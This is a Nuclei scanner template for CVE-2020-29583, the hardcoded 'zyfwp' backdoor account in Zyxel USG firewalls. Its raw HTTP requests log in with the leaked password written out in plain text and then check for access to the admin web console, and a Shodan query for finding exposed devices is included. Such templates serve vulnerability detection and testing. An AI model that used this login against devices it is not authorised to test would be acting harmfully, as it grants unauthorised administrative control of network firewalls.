id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  remediation: |
    Update the firmware of the ZyXel USG device to the latest version, which addresses the hardcoded credentials issue.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
    - http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
    epss-score: 0.95661
    epss-percentile: 0.99203
    cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zyxel
    product: usg20-vpn_firmware
    shodan-query: title:"USG FLEX 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration">'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b6b67ecc110b556184638ab46f0cb56804b3c4225c87a7fdf138764204d8e596022100a6f445d42e5836b942ae67614ce5bbe4b4af76fa11ceae434f80611beeb225df:922c64590222798bb761d5b6d8e72950